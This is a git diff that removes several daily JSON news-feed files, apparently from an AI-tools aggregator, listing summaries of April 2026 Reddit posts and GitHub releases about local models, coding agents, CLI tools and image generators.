"tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.84, - "date": "2026-04-16T21:21:52.000Z", - "summary": "## Changelog\n### New!\n* 3773b23cb44afc4567d892f01c41c8dc62556ca0: feat(shell): add jq as a bash builtin + a jq skill for it (@meowgorithm)\n* b37649e45299d426aeae73a54efc0d1155fb5c91: feat(ui): add skills discovery status to sidebar and landing page (#2384) (@huaiyuWangh)\n* e8f5e2025d2401ffe06123c42226f3b7a20abe3a: feat: show progress bar on rio terminal (#2624) (@andreynering)\n### Fixed\n* f546a071891c4ced02c832ff1789534df2874bda: fix(prompt): remind coder to follow `` format on comm", - "category": "ai_tools" - }, - { - "title": "Qwen3.6-35B is worse at tool use and reasoning loops than 3.5?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sni4c1/qwen3635b_is_worse_at_tool_use_and_reasoning/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-16T22:09:37.000Z", - "summary": "Been running the new model entire evening in different quants and coding tasks with OpenCode. Used oMLX and LM Studio. Used recommended settings for precise tasks (temp 0.6, top-k 20, etc) and OpenCode agent. So far my findings is that the model goes into infinite reasoning loops more often than 3.5, and I sometimes see failed tool calls. The latter could be parser bugs, but the former is the model itself.\n\nIt’s ok on basic apps, but really struggles to move ahead on something more complex like ", - "category": "ai_models" - }, - { - "title": "PSA: Qwen3.6 ships with preserve_thinking. Make sure you have it on.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sne4gh/psa_qwen36_ships_with_preserve_thinking_make_sure/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-16T19:41:55.000Z", - "summary": "I had previously posted [here about a fix to their 3.5 template ](https://www.reddit.com/r/LocalLLaMA/comments/1sg076h/i_tracked_a_major_cache_reuse_issue_down_to_qwen/)to help resolve the KV cache invalidation issue from their template. A lot of you found it useful.\n\nQwen 3.6 now addresses this with a new preserve\\_thinking flag. From their [model page:](https://huggingface.co/Qwen/Qwen3.6-35B-A3B)\n\n>`please use \"preserve_thinking\": True instead of \"chat_template_kwargs\": {\"preserve_thinking", - "category": "ai_models" - }, - { - "title": "Google, please just open source Imagen (2022), Gemini 1.0 Nano and Gemini 1.0 Pro. You have nothing to lose at this point.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sncslc/google_please_just_open_source_imagen_2022_gemini/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-16T18:54:41.000Z", - "summary": "Ok, so imagen (the original one from 2022, not imagen 3/4) should be open source. The gemini 1.0 nano model and the gemini 1.0 pro models should be open source. xAI already open-sourced grok 1, but Google???????? at this point you should open source this\n\nGoogle if you seeing this (prob. not) please open source it in I/O 2026\n\n \nEdit: please open source also palm 2 unicorn and bison, geminii 3.1 destroys it", - "category": "ai_models" - }, - { - "title": "Replaced an LLM's text generation head with one that emits raw machine opcodes. Here are my findings", - "url": "https://reddit.com/r/LocalLLaMA/comments/1snbyh8/replaced_an_llms_text_generation_head_with_one/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-16T18:25:26.000Z", - "summary": "Follow-up to [my previous post](https://www.reddit.com/r/LocalLLaMA/comments/1sm076z/i_cant_stop_thinking_about_this_why_are_we_making/) about why AI agents should not control machines through text.\n\nThe idea: every AI agent today generates human text, parses it, then executes it. That's like controlling a robot arm by dictating English. Tesla FSD replaced that pattern. Cameras go in, steering commands come out, no text in between. Can we do the same for software? Skip the text, emit machine ins", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-17.json b/data/news-feed-2026-04-17.json deleted file mode 100644 index d9f8d55..0000000 --- a/data/news-feed-2026-04-17.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.625Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-17", - "article_count": 15, - "archived_story_count": 370, - "articles": [ - { - "title": "Crush v0.60.0 released", - "url": "https://github.com/charmbracelet/crush/releases/tag/v0.60.0", - "source": "GitHub Releases · Crush", - "tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "matching_tags": [ - "api_update", - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-17T16:55:33.000Z", - "summary": "# Secret release\r\n\r\nYou're not supposed to read through the changelog below.\r\n\r\n## Changelog\r\n### New!\r\n* ea86101bf6c61ee05ca3e887ea65d2f5ff9e68d7: feat(hyper): use openai-compatible endpoint for hyper (#2640) (@andreynering)\r\n\r\n---\r\n\r\n
              \r\nVerifying the artifacts\r\n\r\nFirst, download the [`checksums.txt` file](https://github.com/charmbracelet/crush/releases/download/v0.60.0/checksums.txt) and the [`checksums.txt.sigstore.json` file](https://github.com/charmbracelet/crush/", - "category": "ai_tools" - }, - { - "title": "Adapt: open-source memory that rewrites its own structure when your data surprises it", - "url": "https://reddit.com/r/LocalLLaMA/comments/1so002u/adapt_opensource_memory_that_rewrites_its_own/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-17T12:48:26.000Z", - "summary": "TypeScript library I've been building. The thing I want feedback on: when the memory keeps dismissing data it shouldn't, or queries keep coming back empty, it restructures itself;splits overloaded learners, merges redundant ones, grows new ones for domains nobody configured. \n \nWorks with any Vercel AI SDK provider, so Ollama / LM Studio / llama.cpp plus hosted. \n \nObserve and synthesize are separate LLM calls, so you can run a 7B for observe (the high-volume path) and a bigger model for s", - "category": "ai_models" - }, - { - "title": "Anthropic's AI protocol has critical flaw affecting 200,000 servers", - "url": "https://reddit.com/r/ClaudeAI/comments/1snx2nw/anthropics_ai_protocol_has_critical_flaw/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-17T10:29:36.000Z", - "summary": "https://www.infosecurity-magazine.com/news/systemic-flaw-mcp-expose-150/\n\nSecurity researchers at OX Security disclosed on Tuesday what they describe as a critical, systemic vulnerability in Anthropic's Model Context Protocol, an open-source standard that allows AI models to connect to external data sources and systems. The flaw could enable arbitrary command execution on any vulnerable system, potentially exposing sensitive user data, internal databases, API keys, and chat histories across more", - "category": "ai_tools" - }, - { - "title": "OpenAI Codex Just Got Its Biggest Update Yet", - "url": "https://reddit.com/r/ChatGPT/comments/1sno26n/openai_codex_just_got_its_biggest_update_yet/", - "source": "Reddit r/ChatGPT", - "tags": [ - "developer_tool", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-17T02:27:24.000Z", - "summary": "OpenAI says Codex now works in the app, IDE, terminal, web, GitHub, iOS, and Slack. \n \nRecent upgrades bundled a new GPT-5.3-Codex model for agentic coding, a rebuilt CLI, an IDE extension for VS Code-compatible editors, faster cloud task performance via container caching, automated code review, an in-app browser for rendered pages, and computer use for macOS apps. \n \nApril 2026 added three more shifts: a token-based credit billing model, a new $100 Pro tier with up to 10x Plus usage, and ", - "category": "ai_tools" - }, - { - "title": "[Resource] Anima Style Explorer: A free web tool for ComfyUI styles + Open Source MooshieUI Desktop Client", - "url": "https://reddit.com/r/StableDiffusion/comments/1snkume/resource_anima_style_explorer_a_free_web_tool_for/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-17T00:03:20.000Z", - "summary": "I wanted to share a project I have been building for the community called Anima. It is a completely free web-based style explorer designed to help you discover and visualize different aesthetic prompts and configurations for your Stable Diffusion generations without guesswork.\n\nWeb Version: [https://anima.mooshieblob.com/](https://anima.mooshieblob.com/)\n\n**MooshieUI Integration (Open Source)**\n\nFor those who prefer a local workflow, I have also integrated this into MooshieUI. This is a custom, ", - "category": "creative_tools" - }, - { - "title": "How to Implement Karpathy's LLM Knowledge Base. Full Guide", - "url": "https://reddit.com/r/ChatGPT/comments/1so334n/how_to_implement_karpathys_llm_knowledge_base/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.98, - "date": "2026-04-17T14:45:37.000Z", - "summary": "karpathy introduced his LLM Knowledge base Wiki last week. We've been quietly doing a version of this for months at our Org, but his write-up made me realize how much further you can take it with the right setup.\n\n**the core idea**: using LLM to compile and maintain knowledge. **you feed source documents** \\- articles, papers, sdk references, repos into a raw directory. the model incrementally builds a wiki from them. markdown files, summaries, backlinks, categorized by concept. the llm writes", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.38.2 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.2", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-17T18:38:59.000Z", - "summary": "## What's Changed\n* fix(patch): cherry-pick 14b2f35 to release/v0.38.1-pr-24974 to patch version v0.38.1 and create version 0.38.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25585\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.1...v0.38.2", - "category": "ai_tools" - }, - { - "title": "Vercel CLI vercel@51.7.0 released", - "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.7.0", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-04-17T22:38:37.000Z", - "summary": "### Minor Changes\n\n- [detect-services] If a vercel.toml exists, update the vercel.toml ([#15895](https://github.com/vercel/vercel/pull/15895))\n\n- Use correct filename in messages when config file is not vercel.json ([#15893](https://github.com/vercel/vercel/pull/15893))\n\n- [services] move Python workers to v2beta triggers with private routing ([#15920](https://github.com/vercel/vercel/pull/15920))\n\n### Patch Changes\n\n- Include `action` and `resource` fields from API 403 responses in non-", - "category": "ai_tools" - }, - { - "title": "Vercel CLI vercel@51.6.1 released", - "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.6.1", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.84, - "date": "2026-04-17T02:34:08.000Z", - "summary": "### Patch Changes\n\n- Updated dependencies \\[[`055f6239a4fe763b9f3b33cfbb5baa2e0e214767`](https://github.com/vercel/vercel/commit/055f6239a4fe763b9f3b33cfbb5baa2e0e214767)]:\n - @vercel/build-utils@13.18.0\n - @vercel/backends@0.1.0\n - @vercel/python@6.34.0\n - @vercel/elysia@0.1.68\n - @vercel/express@0.1.78\n - @vercel/fastify@0.1.71\n - @vercel/go@3.5.0\n - @vercel/h3@0.1.77\n - @vercel/hono@0.2.71\n - @vercel/hydrogen@1.3.6\n - @vercel/koa@0.1.51", - "category": "ai_tools" - }, - { - "title": "CadQuery is an open-source Python library for building 3D CAD models", - "url": "https://cadquery.github.io/", - "source": "Hacker News", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.84, - "date": "2026-04-14T23:20:39.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Qwen3.6 GGUF is so good for debugging.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sofcqv/qwen36_gguf_is_so_good_for_debugging/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-17T22:13:05.000Z", - "summary": "using unsloth dynamic quant on 16GB vram + 32GB dram. 200k q8\\_0 kv cache (context window)", - "category": "ai_models" - }, - { - "title": "Intel Arc Pro B70 Open-Source Linux Performance Against NVIDIA RTX & AMD Radeon AI PRO Review", - "url": "https://reddit.com/r/LocalLLaMA/comments/1soe0nm/intel_arc_pro_b70_opensource_linux_performance/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-17T21:20:59.000Z", - "summary": "The R9700 is about 30% more than the B70, but it's more than 30% better. Overall, I rather have a R9700 than a B70.\n\n", - "category": "ai_models" - }, - { - "title": "Trying to Run LTX2.3 locally but getting an error", - "url": "https://reddit.com/r/StableDiffusion/comments/1sodw5o/trying_to_run_ltx23_locally_but_getting_an_error/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-17T21:16:26.000Z", - "summary": "I'm pretty new to all of this, but I thought that the cool thing about LTX 2.3 was that you are able to do image and video generation locally on your own hardware. But it's still connected to the API key that I created which makes it think I'm still trying to use it through the cloud. I tried switching the model to something that would make it generate locally but I guess that wasn't the solution? It was a 25 GB download so I thought that was the answer but now I'm stumped. Can someone explain h", - "category": "creative_tools" - }, - { - "title": "Claude Design just launched and Figma dropped 4.26% in a single day, we are witnessing history in real time", - "url": "https://reddit.com/r/ClaudeAI/comments/1so6z2t/claude_design_just_launched_and_figma_dropped_426/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-17T17:04:24.000Z", - "summary": "I genuinely cannot believe what I'm watching unfold today\n\nAnthropic dropped Claude Design this morning , a tool that lets anyone describe what they want and get back a full website, landing page, or presentation. No design skills needed and No Figma subscription. Just... talk to it\n\nAnd the market reacted instantly. Figma stock is down $0.86 (4.26%) today alone. Adobe, Wix, GoDaddy all bled too. Anthropic's own CPO literally resigned from Figma's board three days ago. The writing was on the wal", - "category": "ai_tools" - }, - { - "title": "Fastest image to image model", - "url": "https://reddit.com/r/StableDiffusion/comments/1so6um1/fastest_image_to_image_model/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-17T17:00:09.000Z", - "summary": "Does anybody know a platform that can deliver **image-to-image** responses in their **API** in less than **7** seconds? I already tried **Nano Banana**, but it takes about **16** seconds or more.", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-18.json b/data/news-feed-2026-04-18.json deleted file mode 100644 index eb464a3..0000000 --- a/data/news-feed-2026-04-18.json +++ /dev/null @@ -1,249 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.827Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-18", - "article_count": 15, - "archived_story_count": 256, - "articles": [ - { - "title": "[Update] GHOST v2.1: Full Native Windows Support is Live.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sp7yhz/update_ghost_v21_full_native_windows_support_is/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-18T20:07:31.000Z", - "summary": "FOR THE UNINITIATED:\n\nGHOST is an open source environment manager that breaks the NVIDIA monopoly. It allows you to run high performance AI models on AMD hardware by automatically injecting ZLUDA and ROCm layers into your Windows environment. No Linux, no complex WSL2 setups, and no driver hacking required.\n\nKEY FEATURES\n\nFull Windows Native Support: Runs directly in PowerShell with a hardened virtualization layer.\n\nAuto Hardware Mapping: Scans your system and spoofs the exact RDNA architecture ", - "category": "ai_models" - }, - { - "title": "easyaligner: Forced alignment with GPU acceleration and flexible text normalization (compatible with all w2v2 models on HF Hub) [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1soyqfw/easyaligner_forced_alignment_with_gpu/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-18T14:13:28.000Z", - "summary": "https://preview.redd.it/f4d5krhkjyvg1.png?width=1020&format=png&auto=webp&s=11310f377b22abbe3dd110cc7d362ba8aae35f8d\n\nI have built [`easyaligner`](https://kb-labb.github.io/easyaligner/), a forced alignment library designed to be performant and easy to use.\n\nHaving worked with preprocessing hundreds of thousands of hours of audio and text for training speech-to-text models, I found that the available open source forced alignment libraries often missed some convenience features. For o", - "category": "ai_research" - }, - { - "title": "We’re proud to open-source LIDARLearn [R] [D] [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sou5u1/were_proud_to_opensource_lidarlearn_r_d_p/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-18T10:36:59.000Z", - "summary": "It’s a unified PyTorch library for 3D point cloud deep learning. To our knowledge, it’s the first framework that supports such a large collection of models in one place, with built-in cross-validation support.\n\nIt brings together 56 ready-to-use configurations covering supervised, self-supervised, and parameter-efficient fine-tuning methods.\n\nYou can run everything from a single YAML file with one simple command.\n\nOne of the best features: after training, you can automatically generate a publica", - "category": "ai_research" - }, - { - "title": "Qwen 3.6 vs 6 other models across 5 agent frameworks on M3 Ultra", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sojag2/qwen_36_vs_6_other_models_across_5_agent/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-18T01:03:58.000Z", - "summary": "I benchmarked Qwen 3.6, Qwen 3.5, and 5 other models across 5 agent frameworks on Apple Silicon — here's the full compatibility matrix\n\n**Hardware:** Apple M3 Ultra, 256GB unified memory\n\n**Frameworks tested:** Hermes Agent (64K stars), PydanticAI, LangChain, smolagents (HuggingFace), OpenClaude/Anthropic SDK\n\n**Models tested:** Qwen 3.6 35B (brand new), Qwen 3.5 35B, Qwopus 27B, Qwen 3.5 27B, Llama 3.3 70B, DeepSeek-R1 32B, Gemma 4 26B\n\n# The Agent Compatibility Matrix\n\nThis is the part I wish ", - "category": "ai_models" - }, - { - "title": "gpt can now control your entire computer like a humain", - "url": "https://reddit.com/r/ChatGPT/comments/1soht46/gpt_can_now_control_your_entire_computer_like_a/", - "source": "Reddit r/ChatGPT", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-17T23:55:34.000Z", - "summary": "Hey everyone, I built something called AriaOS and just open-sourced it. \n\nThe idea is simple: instead of running an agent in a terminal session that only sees text, I gave it its own isolated Debian VM with computer use. It can see the screen, move the mouse, click, type, scroll, open apps, work with files, and operate inside a contained environment.\n\nWhat made the project interesting is that: I didn’t want to rely only on visual automation. I built a hybrid system that combines high-speed local", - "category": "ai_tools" - }, - { - "title": "ChatGPT kept hallucinating my Factorio bottlenecks. So I built an MCP that reads your saves.", - "url": "https://reddit.com/r/ChatGPT/comments/1sp7824/chatgpt_kept_hallucinating_my_factorio/", - "source": "Reddit r/ChatGPT", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.94, - "date": "2026-04-18T19:39:29.000Z", - "summary": "You've probably asked ChatGPT a question about a game you're playing -- \"is this item worth keeping in D2R,\" \"why is my Factorio base bottlenecked,\" \"how does this card interaction work in Magic,\" -- and the answer was hallucinated. The training data is stale, and the gaps get filled with plausible-sounding nonsense.\n\nI built **Savecraft** to fix that. It's an open-source MCP server that reads your actual game saves and feeds ChatGPT real game data instead of letting it guess.\n\nFor example:\n\n* *", - "category": "ai_tools" - }, - { - "title": "Goose v1.31.0 released", - "url": "https://github.com/aaif-goose/goose/releases/tag/v1.31.0", - "source": "GitHub Releases · Goose", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.76, - "date": "2026-04-17T00:44:54.000Z", - "summary": "New version of Goose available.", - "category": "ai_tools" - }, - { - "title": "Qwen 3.6 + vLLM + Docker + 2x RTX 3090 setup, working great!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sp761q/qwen_36_vllm_docker_2x_rtx_3090_setup_working/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-18T19:37:17.000Z", - "summary": "Our nonprofit association has an AI server with 2x RTX 3090 and I finally switched over to vLLM to get better performance for multiple users.\n\nHere's my docker compose file:\n\n services:\n vllm:\n image: vllm/vllm-openai:latest\n container_name: vllm\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n count: all\n capabilities: [gpu]\n environment:\n - VLLM_API_KEY", - "category": "ai_models" - }, - { - "title": "Are you guys actually using local tool calling or is it a collective prank?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sp631h/are_you_guys_actually_using_local_tool_calling_or/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-18T18:54:54.000Z", - "summary": "I don't know if it's something I am doing horribly wrong or what, but running Open WebUI w/ Terminal on Docker with the models on LM Studio and I am starting to think the community keeps praising the tool calling feature just to cope lol\n\n \nQwen3.5 27B, 35B, Gemma4 26B, Qwen3.6 35B, GPS-OSS 20B - I have tried them all using the recommended parameters from Unsloth and asking them to create a single file with data is very finicky **when** it works.\n\n \nToday with Gemma4, it kept assuring me it cr", - "category": "ai_models" - }, - { - "title": "Lore 0.2.0 - the open source local knowledge management app is now much smarter, with a visible reasoning stream, and non-destructive embedding migration", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sp5d6l/lore_020_the_open_source_local_knowledge/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-18T18:27:30.000Z", - "summary": "Quick update on Lore, the local-first memory app I posted here around v0.1.0.\n\nIt's a tray app: global shortcut → chat bar → save or recall in natural language. Everything stays on your machine.\n\n\n\nv0.2.0 highlights:\n\n\n\n\\- ThinkingStream: you watch the agent's reasoning, retrieval, and tool calls\n\n in real time.\n\n\\- Embedding-model migration is now non-destructive. You can swap from\n\n nomic-embed to mxbai-embed (or whatever) without losing data; the new\n\n embeddingTableSync rebuilds in place ", - "category": "ai_models" - }, - { - "title": "EditAnything IC-LoRA - LTX-2.3", - "url": "https://reddit.com/r/StableDiffusion/comments/1sp03jq/editanything_iclora_ltx23/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-18T15:07:01.000Z", - "summary": "This model was trained on **8,000 video pairs**, and training is still ongoing for a few thousand more steps. It is still **experimental**, not trained with a fully professional production target, and the model may be updated unexpectedly as new checkpoints.\n\nThe current goal is not final polished production quality, but to explore:\n\n* edit-anything behavior\n* prompt-following\n* inference tradeoffs\n* synthetic dataset building, especially for **style data**\n\nThe model was trained around four mai", - "category": "creative_tools" - }, - { - "title": "Melodic Brotherhood - I Just Need to Know (video generated with open source tools)", - "url": "https://reddit.com/r/StableDiffusion/comments/1soz67p/melodic_brotherhood_i_just_need_to_know_video/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-18T14:30:57.000Z", - "summary": "Made a '96-'98 Anthem House /Eurodance music video. The images are generated with ZIT and ZIB, Flux Klein 9B and Qwen Image Edit 2511. Video is Wan 2.2, SCAIL (for the dancing), and LTX 2 (for the lip synced singing).\n\nOnly non-open source thing is the music, which is Suno.", - "category": "creative_tools" - }, - { - "title": "Has PP improved enough on m5 max to go for 128gb?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1soz4b4/has_pp_improved_enough_on_m5_max_to_go_for_128gb/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-18T14:28:50.000Z", - "summary": "Few years ago I got caught up in the hype on here for the m1 max 64gb, everyone saying it was great for local, but the reality was pp sucked so bad it wasn't worth using on anything but tiny models.\n\nThinking of upgrading to m5 max, just wondering what the sweet spot is for ram? Can you actually utilise the full 128gb and still have acceptable pp speed for large ctx for agentic coding?", - "category": "ai_models" - }, - { - "title": "Built a program to track logistical intelligence using satellite data [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sov7hr/built_a_program_to_track_logistical_intelligence/", - "source": "Reddit r/MachineLearning", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-18T11:33:14.000Z", - "summary": "Hey guys, I've been workin on something new to track logistical activity near military bases and other hubs. The core problem is that Google maps isn't updated that frequently even with sub meter res and other map providers such as maxar are costly for osint analysts.\n\nBut there's a solution. Drish detects moving vehicles on highways using Sentinel-2 satellite imagery.\n\nThe trick is physics. Sentinel-2 captures its red, green, and blue bands about 1 second apart.\n\nEverything stationary looks nor", - "category": "ai_research" - }, - { - "title": "Is there something like SETI for training open source models?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sov5lb/is_there_something_like_seti_for_training_open/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-18T11:30:33.000Z", - "summary": "Some years ago there were initiatives for distributed computing networks like SETI or even Fold at Home for proteins I think.\n\nWould it be possible that the community could make a network like this for training open source models with non-problematic licenses and more than only open weights? Is that a stupid idea?", - "category": "ai_models" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-19.json b/data/news-feed-2026-04-19.json deleted file mode 100644 index 548f97b..0000000 --- a/data/news-feed-2026-04-19.json +++ /dev/null @@ -1,245 +0,0 @@ -{ - "generated": "2026-06-05T00:44:35.079Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-19", - "article_count": 15, - "archived_story_count": 579, - "articles": [ - { - "title": "whats the best harness/app to use my llm with?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1spr7r4/whats_the_best_harnessapp_to_use_my_llm_with/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-19T12:08:16.000Z", - "summary": "would be nice if i could just use claude desktop app like i can with claude code/extension but sadly it doesnt work with the app\n\nlooking for something with a nice UI/UX, MCP, built in html/doc preview, research, other features etc. basically something that could replace claude desktop/gemini in terms of what features it has with my local model.\n\nseeing things like hermes? cherry studio? good ol LM studio?", - "category": "ai_models" - }, - { - "title": "I tested 8 LLMs as tabletop GMs - a 27B model beat the 405B on narrative quality", - "url": "https://reddit.com/r/LocalLLaMA/comments/1spfz31/i_tested_8_llms_as_tabletop_gms_a_27b_model_beat/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-19T01:59:17.000Z", - "summary": "# Sum B+a+c+k+g+r+o+u+n+d:\n\nI've been working on an open source agentic tabletop GM as a leisure project intended to run on any LLM with tool support. I started it as a [Claude Code skill](https://github.com/Bobby-Gray/claude-dnd-skill) to run D&D sessions and eventually generalized it to be model-agnostic and game system agnostic after wanting to test what it felt like on different backends. Rest assured, D&D purists flamed it immediately because of the AI integration. I set their dimne", - "category": "ai_models" - }, - { - "title": "ZPix, an open-source local image generator, now supports image editing via FLUX.2 [klein] 4B, has a bigger output gallery and a prompts history.", - "url": "https://reddit.com/r/StableDiffusion/comments/1spqczz/zpix_an_opensource_local_image_generator_now/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-19T11:25:49.000Z", - "summary": "To add a reference image, just drag an image directly from output gallery or any location. On my RTX 3070M (8GB VRAM), once warmed, ZPix takes around 10s to generate a 720p image based on a 720p reference.\n\nOutput images are now automatically saved in your Pictures folder, ZPix subfolder, one sub-subfolder per LoRA.\n\nPrompts are stored in a local database file, they are instantly searchable and selectable. You can also retrieve a prompt by dropping in prompt zone an image generated by ZPix, incl", - "category": "creative_tools" - }, - { - "title": "How would you describe the Midjourney look and why does it have one?", - "url": "https://reddit.com/r/midjourney/comments/1spp3nr/how_would_you_describe_the_midjourney_look_and/", - "source": "Reddit r/midjourney", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.78, - "date": "2026-04-19T10:16:50.000Z", - "summary": "I started with Midjourney and have always found it fascinating. Since then, a lot of different models and services are out there and most of them are good. For some reason, Midjourney still has its own look. I could only describe it as ”creative”. And for every new version they release, it becomes better but still ”creative”. The pros is the creativity, you often don’t get what you typically would expect or imagine yourself. The con is that it’s very hard to use in any professional setting other", - "category": "creative_tools" - }, - { - "title": "I created awesome-claude-design using Claude code: DESIGN.md prompts by aesthetic families for Claude Design", - "url": "https://reddit.com/r/ClaudeAI/comments/1spopa1/i_created_awesomeclaudedesign_using_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.78, - "date": 